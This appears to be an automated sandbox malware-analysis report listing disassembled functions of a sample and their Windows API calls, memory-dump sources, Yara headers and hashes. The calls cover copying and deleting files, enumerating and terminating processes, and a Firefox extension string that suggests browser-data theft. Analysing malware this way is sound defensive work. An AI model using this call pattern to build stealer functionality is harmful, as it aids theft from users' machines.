                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                  • Instruction ID: 16f0b493b00f36047ccff397e235a7e8bab34b486e35654506b43f6b36b20b03
                                  • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                  • Instruction Fuzzy Hash: F491E2729203189BCB58FBE4DD65DEEB33AAF64300F504179E60A66194EF346B48CF61
                                  Function 0040D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008855F0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                  • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                  • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 71153f48811ab97277adb1eba65f0c2a50862b60df6060ffb178010a9f1e5c68
                                  • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                                  • Opcode Fuzzy Hash: 71153f48811ab97277adb1eba65f0c2a50862b60df6060ffb178010a9f1e5c68
                                  • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                                  Function 022ED9E7 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                    • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022F8DED
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022EDA68
                                  • lstrlen.KERNEL32(00000000), ref: 022EDC06
                                  • lstrlen.KERNEL32(00000000), ref: 022EDC1A
                                  • DeleteFileA.KERNEL32(00000000), ref: 022EDC99
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                  • Instruction ID: e51021cc05e9b01495d3c9b4beddaf08489f87548c774fb85cca9c9e29f9c888
                                  • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                  • Instruction Fuzzy Hash: BB81D2729203149BCB48FBE4DD65DEEB33AAF64300F50457DE60A66194EF346A48CF61
                                  Function 0040D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008855F0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                  • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                  • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                  • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 6f72e535e7ae17eb60bcd9d89638ab31fc633a2b1ef8f0b3f434f04c74d69d2e
                                  • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                                  • Opcode Fuzzy Hash: 6f72e535e7ae17eb60bcd9d89638ab31fc633a2b1ef8f0b3f434f04c74d69d2e
                                  • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                                  Function 0040F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                  • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 998311485-3310892237
                                  • Opcode ID: 332d76602d9979ba15099d14f0ed3dabde39ec0bd50ccc42a35f2ccae80d985e
                                  • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                  • Opcode Fuzzy Hash: 332d76602d9979ba15099d14f0ed3dabde39ec0bd50ccc42a35f2ccae80d985e
                                  • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                  Function 022F9737 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 022F9752
                                    • Part of subcall function 022F8FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,022F9785,00000000), ref: 022F8FC2
                                    • Part of subcall function 022F8FB7: RtlAllocateHeap.NTDLL(00000000), ref: 022F8FC9
                                    • Part of subcall function 022F8FB7: wsprintfW.USER32 ref: 022F8FDF
                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 022F9812
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 022F9830
                                  • CloseHandle.KERNEL32(00000000), ref: 022F983D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                  • String ID:
                                  • API String ID: 3729781310-0
                                  • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                  • Instruction ID: 40eaccba01de93cecdb031b94f83505154004dcf8ee5387ef2e94164c31c680f
                                  • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                  • Instruction Fuzzy Hash: 663148B5E10348EFDB54DFE0CD48BEDB779EB45300F504428E606AA288DB786A84CF52
                                  Function 004194D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 004194EB
                                    • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                    • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                    • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                  • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                  • String ID:
                                  • API String ID: 396451647-0
                                  • Opcode ID: ee457ade85a58c401a034cc046952df660dfe0af018f09e7080f0d4154ab9e94
                                  • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                  • Opcode Fuzzy Hash: ee457ade85a58c401a034cc046952df660dfe0af018f09e7080f0d4154ab9e94
                                  • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                  Function 022F88E7 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 022F8931
                                  • Process32First.KERNEL32(?,00000128), ref: 022F8945
                                  • Process32Next.KERNEL32(?,00000128), ref: 022F895A
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                  • CloseHandle.KERNEL32(?), ref: 022F89C8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                  • Instruction ID: 538e5d387702898786944a35597ff044d29542a62b893d1b8f5695b26c8807ea
                                  • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                  • Instruction Fuzzy Hash: 9A318D71911318ABCB64DF94CD44FEEF379EB45700F1041A9E60EA22A4DB346E88CF91
                                  Function 00418680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                  • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                  • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • CloseHandle.KERNEL32(?), ref: 00418761
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: 78e734e6add8f3848c475328f99532914076784f23aa1f873a6d1c9a0ebdb1a4
                                  • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                  • Opcode Fuzzy Hash: 78e734e6add8f3848c475328f99532914076784f23aa1f873a6d1c9a0ebdb1a4
                                  • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                  Function 00414F40 Relevance: 6.1, APIs: 4, Instructions: 70stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                  • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                  • lstrcatA.KERNEL32(?,00883520), ref: 00414FAB
                                  • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                    • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                    • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: 33ad484c41b3b6fcfe3cd09fe7520dfc9098197ce8bfaf1b05ec43d91c9f3575
                                  • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                  • Opcode Fuzzy Hash: 33ad484c41b3b6fcfe3cd09fe7520dfc9098197ce8bfaf1b05ec43d91c9f3575
                                  • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                  Function 004187C0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                  • wsprintfA.USER32 ref: 00418850
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 2716131235-2206825331
                                  • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                  • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                                  • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                  • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                                  Function 022F1A07 Relevance: 6.1, APIs: 4, Instructions: 53stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcessstrtok_s
                                  • String ID:
                                  • API String ID: 3407564107-0
                                  • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                  • Instruction ID: 4c607d35608c189c973395c563414f92be7623a87be4eb9aeec53e3cd5ce4e36
                                  • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                  • Instruction Fuzzy Hash: 67115B75910209EFCB04DFE4D958AEDBB75FF04705F408469E90967250E7705B14CF65
                                  Function 022F7BE7 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 022F7C17
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022F7C1E
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 022F7C2B
                                  • wsprintfA.USER32 ref: 022F7C5A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                  • Instruction ID: 55b915544e306526a7f24f824c9259a5c326e43306ee120ffebf3e302949d2a3
                                  • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                  • Instruction Fuzzy Hash: 461127B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280D2795940CBB1
                                  Function 00417980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                  • wsprintfA.USER32 ref: 004179F3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 1243822799-0
                                  • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                  • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                  • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                  • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                  Function 022F7C97 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 022F7CCA
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022F7CD1
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 022F7CE4
                                  • wsprintfA.USER32 ref: 022F7D1E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
